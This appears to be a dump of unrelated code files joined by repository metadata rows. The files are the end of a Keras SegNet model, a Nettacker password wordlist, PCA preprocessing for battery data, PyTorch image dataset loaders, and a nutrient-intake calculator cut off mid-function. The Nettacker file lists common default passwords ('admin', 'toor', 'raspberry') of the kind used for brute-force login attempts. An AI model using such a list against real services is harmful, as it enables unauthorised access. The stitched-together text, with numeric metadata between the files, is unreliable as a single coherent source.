model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(64,64)
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(128,128)
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(256,256)
model.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(img_w, img_h,3), padding='same', activation='relu',data_format='channels_last'))
model.add(BatchNormalization())
model.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(n_label, (1, 1), strides=(1, 1), padding='same'))
model.add(Reshape((img_w*img_h,n_label)))
#axis=1和axis=2互换位置,等同于np.swapaxes(layer,1,2)
#model.add(Permute((2,1)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy',optimizer='sgd',metrics=['accuracy'])
model.summary()
return model
model = SegNet()
| 48.907216 | 143 | 0.619309 | 611 | 4,744 | 4.770867 | 0.109656 | 0.181132 | 0.129674 | 0.089194 | 0.851458 | 0.844597 | 0.837736 | 0.837736 | 0.837736 | 0.837736 | 0 | 0.077438 | 0.180649 | 4,744 | 96 | 144 | 49.416667 | 0.672498 | 0.040051 | 0 | 0.815789 | 0 | 0 | 0.063063 | 0.005405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013158 | false | 0 | 0.026316 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d273595e9836e3bad2b848c34f4fe60111cc44d | 819 | py | Python | lib/payload/wordlists/passwords.py | ayumi-cloud/Nettacker | 625b88a695a89bd4c1d3510a0294d0ef952d849c | [
"Apache-2.0"
] | 1 | 2021-08-15T16:17:06.000Z | 2021-08-15T16:17:06.000Z | lib/payload/wordlists/passwords.py | zer0x0/Nettacker | 52c5e39a3fd0ab9842c7cf1a8be2de9f560c5d53 | [
"Apache-2.0"
] | 104 | 2018-04-30T03:59:58.000Z | 2022-03-31T02:31:34.000Z | lib/payload/wordlists/passwords.py | pradeepjairamani/OWASP-Nettacker | 988bd960d31e1982d422f6e58590b0f34d7e5215 | [
"Apache-2.0"
] | 1 | 2021-07-23T23:38:19.000Z | 2021-07-23T23:38:19.000Z | def passwords():
return ['123456', 'password', '12345678', 'qwerty', 'abc123', '123456789', '111111', '1234567', 'iloveyou', 'adobe123', '123123', 'admin', '1234567890', 'letmein', 'photoshop', '1234', 'monkey', 'shadow', 'sunshine', '12345', 'password1', 'princess', 'azerty', 'trustno1', '000000', '1dc13d', 'admin', '123123', 'admin1', 'admins', '123456', '12345678', '7777777', 'letmein', '121212', 'qweqwe', 'iloveyou', 'administrator', 'holysh!t', '55555', '1q2w3e', 'qwerty', 'wordpress', 'wpsite', 'internet', 'asdfghjkl', '121314', 'lollipop', 'killer', 'pass', 'lovers', 'hello', 'dragon', 'admin123', 'office', 'jerome', 'fyfcnfcbz', '', 'root', 'user', '1qaz2wsx', 'toor', 'raspberry', 'dietpi', 'test', 'uploader', 'marketing', 'webadmin', 'webmaster', 'maintaince', 'techsupport', 'logon', 'Passw@rd'] | 409.5 | 802 | 0.628816 | 77 | 819 | 6.688312 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177027 | 0.096459 | 819 | 2 | 802 | 409.5 | 0.518919 | 0 | 0 | 0 | 0 | 0 | 0.608537 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 1 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 8 |
ed9f85e2d80a21f92f237cfd4d486c41a865259b | 9,399 | py | Python | kratosbat/DataProcess/PCA.py | kratos-batteries/kratos-batteries | 5f6bc8824b10144ff7b2f0a00df9baaf5f80c357 | [
"MIT"
] | 1 | 2020-07-14T22:52:55.000Z | 2020-07-14T22:52:55.000Z | kratosbat/DataProcess/PCA.py | kratos-batteries/kratos-batteries | 5f6bc8824b10144ff7b2f0a00df9baaf5f80c357 | [
"MIT"
] | 5 | 2020-03-09T17:52:27.000Z | 2020-03-18T17:13:16.000Z | kratosbat/DataProcess/PCA.py | kratos-batteries/kratos-batteries | 5f6bc8824b10144ff7b2f0a00df9baaf5f80c357 | [
"MIT"
] | null | null | null | """
This PCA analysis will produce normalized data to \
be used for the training model
"""
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.decomposition import PCA
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
def pcacsv(DF):
#Change strings to numbers
LB = preprocessing.LabelBinarizer()
WI=LB.fit_transform(np.array(DF.loc[:,['Working Ion']]))
CS=LB.fit_transform(np.array(DF.loc[:,['Crystal System']]))
SN=LB.fit_transform(np.array(DF.loc[:,['Spacegroup Number']]))
EL=np.array(DF.loc[:,['mean_Number', 'mean_MendeleevNumber',
'mean_AtomicWeight', 'mean_MeltingT', 'mean_Column', 'mean_Row',
'mean_CovalentRadius', 'mean_Electronegativity', 'mean_NsValence',
'mean_NpValence', 'mean_NdValence', 'mean_NfValence', 'mean_NValance',
'mean_NsUnfilled', 'mean_NpUnfilled', 'mean_NdUnfilled',
'mean_NfUnfilled', 'mean_NUnfilled', 'mean_GSvolume_pa',
'mean_GSbandgap', 'mean_GSmagmom', 'mean_SpaceGroupNumber',
'dev_Number', 'dev_MendeleevNumber', 'dev_AtomicWeight', 'dev_MeltingT',
'dev_Column', 'dev_Row', 'dev_CovalentRadius', 'dev_Electronegativity',
'dev_NsValence', 'dev_NpValence', 'dev_NdValence', 'dev_NfValence',
'dev_NValance', 'dev_NsUnfilled', 'dev_NpUnfilled', 'dev_NdUnfilled',
'dev_NfUnfilled', 'dev_NUnfilled', 'dev_GSvolume_pa', 'dev_GSbandgap',
'dev_GSmagmom', 'dev_SpaceGroupNumber', 'mean_Number.1',
'mean_MendeleevNumber.1', 'mean_AtomicWeight.1', 'mean_MeltingT.1',
'mean_Column.1', 'mean_Row.1', 'mean_CovalentRadius.1',
'mean_Electronegativity.1', 'mean_NsValence.1', 'mean_NpValence.1',
'mean_NdValence.1', 'mean_NfValence.1', 'mean_NValance.1',
'mean_NsUnfilled.1', 'mean_NpUnfilled.1', 'mean_NdUnfilled.1',
'mean_NfUnfilled.1', 'mean_NUnfilled.1', 'mean_GSvolume_pa.1',
'mean_GSbandgap.1', 'mean_GSmagmom.1', 'mean_SpaceGroupNumber.1',
'dev_Number.1', 'dev_MendeleevNumber.1', 'dev_AtomicWeight.1',
'dev_MeltingT.1', 'dev_Column.1', 'dev_Row.1', 'dev_CovalentRadius.1',
'dev_Electronegativity.1', 'dev_NsValence.1', 'dev_NpValence.1',
'dev_NdValence.1', 'dev_NfValence.1', 'dev_NValance.1',
'dev_NsUnfilled.1', 'dev_NpUnfilled.1', 'dev_NdUnfilled.1',
'dev_NfUnfilled.1', 'dev_NUnfilled.1', 'dev_GSvolume_pa.1',
'dev_GSbandgap.1', 'dev_GSmagmom.1', 'dev_SpaceGroupNumber.1']])
PROP = np.hstack((WI, CS, SN, EL))
return DF, PROP
def pcasts():
#Use StandardScaler
DF, PROP = pcacsv(pd.read_csv('../Data/TrainingData.csv'))
SS = StandardScaler()
SS.fit(PROP)
PSS = SS.transform(PROP)
PCA1 = PCA(n_components=165)
NEW_DATA = PCA1.fit_transform(PSS)
NEW_DF = pd.DataFrame(NEW_DATA)
OUTPUTS = np.array(DF.loc[:, ['Gravimetric Capacity (units)', \
'Volumetric Capacity', 'Max Delta Volume']])
NEW_DF['Gravimetric Capacity (units)'] = SS.fit_transform(OUTPUTS)[:, [0]]
NEW_DF['Volumetric Capacity'] = SS.fit_transform(OUTPUTS)[:, [1]]
NEW_DF['Max Delta Volume'] = SS.fit_transform(OUTPUTS)[:, [2]]
NEW_DF.to_csv('../Data/NEWTrainingData_StandardScaler.csv')
return
def pcamms():
#Use MinMaxScaler
DF, PROP = pcacsv(pd.read_csv('../Data/TrainingData.csv'))
MS = MinMaxScaler()
PMS = MS.fit_transform(PROP)
PCA2 = PCA(n_components=115)
NEW_DATA2 = PCA2.fit_transform(PMS)
NEW_DF2 = pd.DataFrame(NEW_DATA2)
OUTPUTS = np.array(DF.loc[:, ['Gravimetric Capacity (units)', \
'Volumetric Capacity', 'Max Delta Volume']])
NEW_DF2['Gravimetric Capacity (units)'] = MS.fit_transform(OUTPUTS)[:, [0]]
NEW_DF2['Volumetric Capacity'] = MS.fit_transform(OUTPUTS)[:, [1]]
NEW_DF2['Max Delta Volume'] = MS.fit_transform(OUTPUTS)[:, [2]]
NEW_DF2.to_csv('../Data/NEWTrainingData_MinMaxScaler.csv')
return
def transts(data):
#Transform data
#Use StandardScaler
CSV = pd.read_csv('../Data/TrainingData.csv')
DF, PROP = pcacsv(CSV)
data.columns=['Battery ID', 'Working Ion', 'Crystal System', 'Spacegroup Number',
'Gravimetric Capacity (units)', 'Volumetric Capacity',
'Max Delta Volume', 'mean_Number', 'mean_MendeleevNumber',
'mean_AtomicWeight', 'mean_MeltingT', 'mean_Column', 'mean_Row',
'mean_CovalentRadius', 'mean_Electronegativity', 'mean_NsValence',
'mean_NpValence', 'mean_NdValence', 'mean_NfValence', 'mean_NValance',
'mean_NsUnfilled', 'mean_NpUnfilled', 'mean_NdUnfilled',
'mean_NfUnfilled', 'mean_NUnfilled', 'mean_GSvolume_pa',
'mean_GSbandgap', 'mean_GSmagmom', 'mean_SpaceGroupNumber',
'dev_Number', 'dev_MendeleevNumber', 'dev_AtomicWeight', 'dev_MeltingT',
'dev_Column', 'dev_Row', 'dev_CovalentRadius', 'dev_Electronegativity',
'dev_NsValence', 'dev_NpValence', 'dev_NdValence', 'dev_NfValence',
'dev_NValance', 'dev_NsUnfilled', 'dev_NpUnfilled', 'dev_NdUnfilled',
'dev_NfUnfilled', 'dev_NUnfilled', 'dev_GSvolume_pa', 'dev_GSbandgap',
'dev_GSmagmom', 'dev_SpaceGroupNumber', 'mean_Number.1',
'mean_MendeleevNumber.1', 'mean_AtomicWeight.1', 'mean_MeltingT.1',
'mean_Column.1', 'mean_Row.1', 'mean_CovalentRadius.1',
'mean_Electronegativity.1', 'mean_NsValence.1', 'mean_NpValence.1',
'mean_NdValence.1', 'mean_NfValence.1', 'mean_NValance.1',
'mean_NsUnfilled.1', 'mean_NpUnfilled.1', 'mean_NdUnfilled.1',
'mean_NfUnfilled.1', 'mean_NUnfilled.1', 'mean_GSvolume_pa.1',
'mean_GSbandgap.1', 'mean_GSmagmom.1', 'mean_SpaceGroupNumber.1',
'dev_Number.1', 'dev_MendeleevNumber.1', 'dev_AtomicWeight.1',
'dev_MeltingT.1', 'dev_Column.1', 'dev_Row.1', 'dev_CovalentRadius.1',
'dev_Electronegativity.1', 'dev_NsValence.1', 'dev_NpValence.1',
'dev_NdValence.1', 'dev_NfValence.1', 'dev_NValance.1',
'dev_NsUnfilled.1', 'dev_NpUnfilled.1', 'dev_NdUnfilled.1',
'dev_NfUnfilled.1', 'dev_NUnfilled.1', 'dev_GSvolume_pa.1',
'dev_GSbandgap.1', 'dev_GSmagmom.1', 'dev_SpaceGroupNumber.1']
NData = pd.concat(objs=[data,CSV],axis=0)
NDF, NPROP = pcacsv(NData)
SS = StandardScaler()
SS.fit(PROP)
PSS = SS.transform(PROP)
PCA1 = PCA(n_components=165)
PCA1.fit(PSS)
NEW_DATA1=PCA1.transform(SS.transform(NPROP[0].reshape(1,-1)))
return NEW_DATA1
def tranmms(data):
#Transform data
#Use MinMaxScaler
CSV = pd.read_csv('../Data/TrainingData.csv')
DF, PROP = pcacsv(CSV)
data.columns=['Battery ID', 'Working Ion', 'Crystal System', 'Spacegroup Number',
'Gravimetric Capacity (units)', 'Volumetric Capacity',
'Max Delta Volume', 'mean_Number', 'mean_MendeleevNumber',
'mean_AtomicWeight', 'mean_MeltingT', 'mean_Column', 'mean_Row',
'mean_CovalentRadius', 'mean_Electronegativity', 'mean_NsValence',
'mean_NpValence', 'mean_NdValence', 'mean_NfValence', 'mean_NValance',
'mean_NsUnfilled', 'mean_NpUnfilled', 'mean_NdUnfilled',
'mean_NfUnfilled', 'mean_NUnfilled', 'mean_GSvolume_pa',
'mean_GSbandgap', 'mean_GSmagmom', 'mean_SpaceGroupNumber',
'dev_Number', 'dev_MendeleevNumber', 'dev_AtomicWeight', 'dev_MeltingT',
'dev_Column', 'dev_Row', 'dev_CovalentRadius', 'dev_Electronegativity',
'dev_NsValence', 'dev_NpValence', 'dev_NdValence', 'dev_NfValence',
'dev_NValance', 'dev_NsUnfilled', 'dev_NpUnfilled', 'dev_NdUnfilled',
'dev_NfUnfilled', 'dev_NUnfilled', 'dev_GSvolume_pa', 'dev_GSbandgap',
'dev_GSmagmom', 'dev_SpaceGroupNumber', 'mean_Number.1',
'mean_MendeleevNumber.1', 'mean_AtomicWeight.1', 'mean_MeltingT.1',
'mean_Column.1', 'mean_Row.1', 'mean_CovalentRadius.1',
'mean_Electronegativity.1', 'mean_NsValence.1', 'mean_NpValence.1',
'mean_NdValence.1', 'mean_NfValence.1', 'mean_NValance.1',
'mean_NsUnfilled.1', 'mean_NpUnfilled.1', 'mean_NdUnfilled.1',
'mean_NfUnfilled.1', 'mean_NUnfilled.1', 'mean_GSvolume_pa.1',
'mean_GSbandgap.1', 'mean_GSmagmom.1', 'mean_SpaceGroupNumber.1',
'dev_Number.1', 'dev_MendeleevNumber.1', 'dev_AtomicWeight.1',
'dev_MeltingT.1', 'dev_Column.1', 'dev_Row.1', 'dev_CovalentRadius.1',
'dev_Electronegativity.1', 'dev_NsValence.1', 'dev_NpValence.1',
'dev_NdValence.1', 'dev_NfValence.1', 'dev_NValance.1',
'dev_NsUnfilled.1', 'dev_NpUnfilled.1', 'dev_NdUnfilled.1',
'dev_NfUnfilled.1', 'dev_NUnfilled.1', 'dev_GSvolume_pa.1',
'dev_GSbandgap.1', 'dev_GSmagmom.1', 'dev_SpaceGroupNumber.1']
NData = pd.concat(objs=[data,CSV],axis=0)
NDF, NPROP = pcacsv(NData)
MS = MinMaxScaler()
MS.fit(PROP)
PMS = MS.transform(PROP)
PCA2 = PCA(n_components=115)
PCA2.fit(PMS)
NEW_DATA2=PCA2.transform(MS.transform(NPROP[0].reshape(1,-1)))
return NEW_DATA2 | 49.994681 | 95 | 0.649963 | 1,104 | 9,399 | 5.245471 | 0.108696 | 0.045588 | 0.009325 | 0.012433 | 0.827491 | 0.803661 | 0.803661 | 0.778449 | 0.767052 | 0.753238 | 0 | 0.023772 | 0.198851 | 9,399 | 188 | 96 | 49.994681 | 0.745286 | 0.021492 | 0 | 0.735099 | 0 | 0 | 0.519495 | 0.091266 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033113 | false | 0 | 0.039735 | 0 | 0.10596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
edabad4870c7c2a7ed37568c95d16f144064e0f1 | 5,791 | py | Python | nvidia_original/src/datasets/dataset_image.py | lgraesser/im2im2im | 835d84b782921f6c40d8cc4416c3fc492187eb58 | [
"MIT"
] | 7 | 2018-04-17T09:56:37.000Z | 2021-08-28T10:03:22.000Z | nvidia_original/src/datasets/dataset_image.py | lgraesser/im2im2im | 835d84b782921f6c40d8cc4416c3fc492187eb58 | [
"MIT"
] | null | null | null | nvidia_original/src/datasets/dataset_image.py | lgraesser/im2im2im | 835d84b782921f6c40d8cc4416c3fc492187eb58 | [
"MIT"
] | 2 | 2018-03-03T20:39:49.000Z | 2018-04-17T03:48:23.000Z | """
Copyright (C) 2017 NVIDIA Corporation. All rights reserved.
Licensed under the CC BY-NC-ND 4.0 license (https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode).
"""
from __future__ import print_function
import os
import numpy as np
import cv2
import torch
import torch.utils.data as data
class dataset_image(data.Dataset):
def __init__(self, specs):
self.root = specs['root']
self.folder = specs['folder']
self.list_name = specs['list_name']
self.scale = specs['scale']
self.crop_image_height = specs['crop_image_height']
self.crop_image_width = specs['crop_image_width']
list_fullpath = os.path.join(self.root, self.list_name)
with open(list_fullpath) as f:
content = f.readlines()
self.images = [os.path.join(self.root, self.folder, x.strip().split(' ')[0]) for x in content]
np.random.shuffle(self.images)
self.dataset_size = len(self.images)
def __getitem__(self, index):
crop_img = self._load_one_image(self.images[index])
raw_data = crop_img.transpose((2, 0, 1)) # convert to HWC
data = ((torch.FloatTensor(raw_data)/255.0)-0.5)*2
return data
def __len__(self):
return self.dataset_size
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
if self.scale > 0:
img = cv2.resize(img,None,fx=self.scale,fy=self.scale)
img = np.float32(img)
h, w, c = img.shape
if test==True:
x_offset = np.int( (w - self.crop_image_width)/2 )
y_offset = np.int( (h - self.crop_image_height)/2 )
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
class dataset_blur_image(dataset_image):
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
img = cv2.GaussianBlur(img, (3,3), 0)
if self.scale > 0:
img = cv2.resize(img, None, fx=self.scale, fy=self.scale)
img = np.float32(img)
h, w, c = img.shape
if test == True:
x_offset = np.int((w - self.crop_image_width) / 2)
y_offset = np.int((h - self.crop_image_height) / 2)
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
class dataset_imagenet_image(dataset_image):
def __init__(self, specs):
self.root = specs['root']
self.folder = specs['folder']
self.list_name = specs['list_name']
self.crop_image_height = specs['crop_image_height']
self.crop_image_width = specs['crop_image_width']
self.scale = specs['scale']
list_fullpath = os.path.join(self.root, self.list_name)
with open(list_fullpath) as f:
content = f.readlines()
self.images = [os.path.join(self.root, self.folder, x.strip().split(' ')[0]) for x in content]
np.random.shuffle(self.images)
self.dataset_size = len(self.images)
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
h, w, c = img.shape
if h > w:
scale = self.crop_image_width * 1.0 / w
else:
scale = self.crop_image_height * 1.0 / h
scale *= self.scale
img = cv2.resize(img, None, fx=scale, fy=scale)
img = np.float32(img)
h, w, c = img.shape
if test == True:
x_offset = np.int((w - self.crop_image_width) / 2)
y_offset = np.int((h - self.crop_image_height) / 2)
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
class dataset_dvd_image(dataset_image):
def __init__(self, specs):
self.root = specs['root']
self.folder = specs['folder']
self.list_name = specs['list_name']
self.crop_image_height = specs['crop_image_height']
self.crop_image_width = specs['crop_image_width']
list_fullpath = os.path.join(self.root, self.list_name)
with open(list_fullpath) as f:
content = f.readlines()
self.images = [os.path.join(self.root, self.folder, x.strip().split(' ')[0]) for x in content]
np.random.shuffle(self.images)
self.dataset_size = len(self.images)
def _load_one_image(self, img_name, test=False):
img = cv2.cvtColor(cv2.imread(img_name), cv2.COLOR_BGR2RGB)
h, w, c = img.shape
# if h > w:
# scale = self.crop_image_width * 1.0 / w
# else:
# scale = self.crop_image_height * 1.0 / h
# img = cv2.resize(img, None, fx=scale, fy=scale)
img = np.float32(img)
h, w, c = img.shape
if test == True:
x_offset = np.int((w - self.crop_image_width) / 2)[0]
y_offset = np.int((h - self.crop_image_height) / 2)[0]
else:
if np.random.rand(1) > 0.5:
img = cv2.flip(img, 1)
x_offset = np.int32(np.random.randint(0, w - self.crop_image_width + 1, 1))[0]
y_offset = np.int32(np.random.randint(0, h - self.crop_image_height + 1, 1))[0]
crop_img = img[y_offset:(y_offset + self.crop_image_height), x_offset:(x_offset + self.crop_image_width), :]
return crop_img
| 40.215278 | 112 | 0.659817 | 948 | 5,791 | 3.814346 | 0.120253 | 0.099558 | 0.122235 | 0.089325 | 0.85979 | 0.853982 | 0.853982 | 0.853982 | 0.853982 | 0.853982 | 0 | 0.03042 | 0.193922 | 5,791 | 143 | 113 | 40.496504 | 0.744216 | 0.057158 | 0 | 0.798387 | 0 | 0 | 0.031032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072581 | false | 0 | 0.048387 | 0.008065 | 0.201613 | 0.008065 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b65067cac12360afc3464cb72172c0bb518349fc | 14,150 | py | Python | gfdx/analysis/potential_nutrient_intake.py | nanthony007/gfdx | 2ca37496f681d91572e6a8237f9b0f1a0056fd8f | [
"MIT"
] | null | null | null | gfdx/analysis/potential_nutrient_intake.py | nanthony007/gfdx | 2ca37496f681d91572e6a8237f9b0f1a0056fd8f | [
"MIT"
] | null | null | null | gfdx/analysis/potential_nutrient_intake.py | nanthony007/gfdx | 2ca37496f681d91572e6a8237f9b0f1a0056fd8f | [
"MIT"
] | 1 | 2020-11-28T19:49:17.000Z | 2020-11-28T19:49:17.000Z | # -*- coding: utf-8 -*-
"""Potential Nutrient Intake.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/107j9j8FvTv9WRSWEZMyJv1uODpyJFbl_
## Potential Nutrient intake
"""
# Install package to allow import from REDCap API
from redcap import Project
import pandas as pd
import numpy as np
import os
from tqdm.notebook import tqdm # progress bar
# Connecting to GFDx Redcap API
api_key = os.environ.get("APIKEY")
# Connecting to GFDx Redcap API
URL = "https://redcap.emory.edu/api/"
project = Project(URL, api_key)
# Pulls out variables of interest
fields_of_interest = [
"country_code",
"nutrient_level",
"latest_intake_api",
"ip_pc_api",
"compliance_pc_api",
"standard_nutrient",
]
subset = project.export_records(fields=fields_of_interest, format="df")
# Reset index
df = subset
df.reset_index(inplace=True)
df = df[df.country_code != 999.0] # Remove country code 999
food_list = [
"maize_flour_arm_1",
"wheat_flour_arm_1",
"rice_arm_1",
"salt_arm_1",
"oil_arm_1",
"maize_flour_arm_2",
"wheat_flour_arm_2",
"rice_arm_2",
"salt_arm_2",
"oil_arm_2",
]
df2 = df[df.redcap_event_name.isin(food_list)]
df1 = df2[df.redcap_repeat_instrument == "nutrients_compounds"]
df_copy1 = df1
# 1. Nutrient Intake
def intake_pc(row):
try:
return float(row.nutrient_level) / 1000 * (float(row.latest_intake_api))
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_intake"] = df_copy1.apply(lambda row: intake_pc(row), axis=1)
# 2. Nutrient Intake, Adjusted
def intake_adj_pc(row):
if row.nutrient_intake == "Not enough data to calculate":
return "Not enough data to calculate"
else:
try:
return (
float(row.nutrient_intake)
* (float(row.ip_pc_api) / 100)
* (float(row.compliance_pc_api) / 100)
)
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_intake_adj"] = df_copy1.apply(lambda row: intake_adj_pc(row), axis=1)
# 3. EAR
def ear_pc(row):
if row.nutrient_intake == "Not enough data to calculate":
return "Not enough data to calculate"
elif row.standard_nutrient == 1:
try:
return float(row.nutrient_intake) / 1.1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 2:
try:
return float(row.nutrient_intake) / 0.002 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 3:
try:
return float(row.nutrient_intake) / 800 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 4:
try:
return float(row.nutrient_intake) / 3 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 5:
try:
return float(row.nutrient_intake) / 0.4 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 6:
try:
return float(row.nutrient_intake) / 0.095 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 7:
try:
return float(row.nutrient_intake) / 8.1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 8:
try:
return float(row.nutrient_intake) / 11 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 9:
try:
return float(row.nutrient_intake) / 0.9 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 10:
try:
return float(row.nutrient_intake) / 0.045 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 11:
try:
return float(row.nutrient_intake) / 0.9 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 12:
try:
return float(row.nutrient_intake) / 0.5 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 13:
try:
return float(row.nutrient_intake) / 0.01 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 14:
try:
return float(row.nutrient_intake) / 12 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 15:
try:
return float(row.nutrient_intake) / 6.8 * 100
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_ear_pc"] = df_copy1.apply(lambda row: ear_pc(row), axis=1)
# 3. EAR, Adjusted
def ear_adj_pc(row):
if row.nutrient_intake_adj == "Not enough data to calculate":
return "Not enough data to calculate"
elif row.standard_nutrient == 1:
try:
return float(row.nutrient_intake_adj) / 1.1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 2:
try:
return float(row.nutrient_intake_adj) / 0.002 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 3:
try:
return float(row.nutrient_intake_adj) / 800 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 4:
try:
return float(row.nutrient_intake_adj) / 3 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 5:
try:
return float(row.nutrient_intake_adj) / 0.4 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 6:
try:
return float(row.nutrient_intake_adj) / 0.095 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 7:
try:
return float(row.nutrient_intake_adj) / 8.1 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 8:
try:
return float(row.nutrient_intake_adj) / 11 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 9:
try:
return float(row.nutrient_intake_adj) / 0.9 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 10:
try:
return float(row.nutrient_intake_adj) / 0.045 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 11:
try:
return float(row.nutrient_intake_adj) / 0.9 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 12:
try:
return float(row.nutrient_intake_adj) / 0.5 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 13:
try:
return float(row.nutrient_intake_adj) / 0.01 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 14:
try:
return float(row.nutrient_intake_adj) / 12 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 15:
try:
return float(row.nutrient_intake_adj) / 6.8 * 100
except ValueError:
return "Not enough data to calculate"
df_copy1["nutrient_ear_pc_adj"] = df_copy1.apply(lambda row: ear_adj_pc(row), axis=1)
# 5. UL
def ul_pc(row):
if (
row.standard_nutrient == 2
or row.standard_nutrient == 9
or row.standard_nutrient == 11
):
return "No UL for this nutrient"
elif row.nutrient_intake == "Not enough data to calculate":
return "Not enough data to calculate"
elif row.standard_nutrient == 1:
try:
return float(row.nutrient_intake) / 100 * 100
except ValueError:
return "Not enough data to calculate"
elif row.standard_nutrient == 3:
try:
return float(row.nutrient_intake) / 2500 * 100
